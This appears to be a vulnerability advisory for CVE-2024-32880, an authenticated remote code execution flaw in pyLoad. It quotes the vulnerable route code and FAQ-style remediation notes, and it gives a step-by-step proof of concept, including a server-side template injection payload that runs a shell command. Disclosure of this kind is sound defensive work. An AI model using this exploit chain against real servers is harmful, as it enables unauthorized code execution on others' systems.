CVE-2024-32880: pyLoad allows upload to arbitrary folder lead to RCE
Summary An authenticated user can change the download folder and upload a crafted template to the specified folder lead to remote code execution
Details example version: 0.5 file:src/pyload/webui/app/blueprints/appblueprint.py python @bp.route("/render/<path:filename>", endpoint="render") def render(filename): mimetype = mimetypes.guesstype(filename)[0] or "text/html" data = rendertemplate(filename) return flask.Response(data, mimetype=mimetype) So, if we can control file in the path "pyload/webui/app/templates" in latest version and path in "module/web/media/js"(the difference is the older version0.4.20 only renders file with extension name ".js"), the rendertemplate func will works like SSTI(server-side template injection) when render the evil file we control.
in /settings page and the choose option general/general, where we can change the download folder. !image
Also, we can find the pyLoad install folder in /info page !image So, we can change the value of Download folder to the template path. Then through /json/addpackage we can upload a crafted template file to RCE. python @bp.route("/json/addpackage", methods=["POST"], endpoint="addpackage") @apivercheck @loginrequired("ADD") def addpackage(): api = flask.currentapp.config["PYLOADAPI"]
packagename = flask.request.form.get("addname", "New Package").strip() queue = int(flask.request.form["adddest"]) links = [l.strip() for l in flask.request.form["addlinks"].splitlines()] pw = flask.request.form.get("addpassword", "").strip("\n\r")
try: file = flask.request.files["addfile"]
if file.filename: if not packagename or packagename == "New Package": packagename = file.filename
filepath = os.path.join( api.getconfigvalue("general", "storagefolder"), "tmp" + file.filename ) file.save(filepath) links.insert(0, filepath)
except Exception: pass
urls = [url for url in links if url.strip()] pack = api.addpackage(packagename, urls, queue) if pw: data = {"password": pw} api.setpackagedata(pack, data)
return jsonify(True) PoC First login into the admin page, then visit the info page to get the path of pyload installation folder. Second, change the download folder to PYLOADINSTALLDIR/ webui/app/templates/ Third, upload crafted template file through /json/addpackage through parameter addfile the content of crafted template file and its filename is "341.html": {{x.init.globals['builtins']'eval'.popen('whoami').read()")}} !image Last, visit http://TARGET/render/tmp341.html to trigger the RCE !image !image
Impact It is a RCE vulnerability and I think it affects all versions. In earlier version 0.4.20, the trigger difference is the pyload installation folder path difference and the upload file must with extension ".js" . The render js code in version 0.4.20: python @route("/media/js/<path:re:.+\.js>") def jsdynamic(path): response.headers['Expires'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime(time.time() + 60 60 24 2)) response.headers['Cache-control'] = "public" response.headers['Content-Type'] = "text/javascript; charset=UTF-8"
try: # static files are not rendered if "static" not in path and "mootools" not in path: t = env.gettemplate("js/%s" % path) return t.render() else: return staticfile(path, root=join(PROJECTDIR, "media", "js")) except: return HTTPError(404, "Not Found")
Other sources
pyload is an open-source Download Manager written in pure Python. An authenticated user can change the download folder and upload a crafted template to the specified folder lead to remote code execution. There is no fix available at the time of publication.
— MITRE
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2024-32880?
CVE-2024-32880 is a high severity vulnerability that allows authenticated users to perform remote code execution.
How do I fix CVE-2024-32880?
To mitigate CVE-2024-32880, upgrade to a version of pyload-ng that is above 0.5.0.
Who is affected by CVE-2024-32880?
CVE-2024-32880 affects authenticated users of pyload-ng version 0.5.0 and below.
What are the potential impacts of CVE-2024-32880?
The potential impacts of CVE-2024-32880 include unauthorized file manipulation and remote code execution on the server.
Is CVE-2024-32880 exploitable remotely?
Yes, CVE-2024-32880 is exploitable remotely by authenticated users.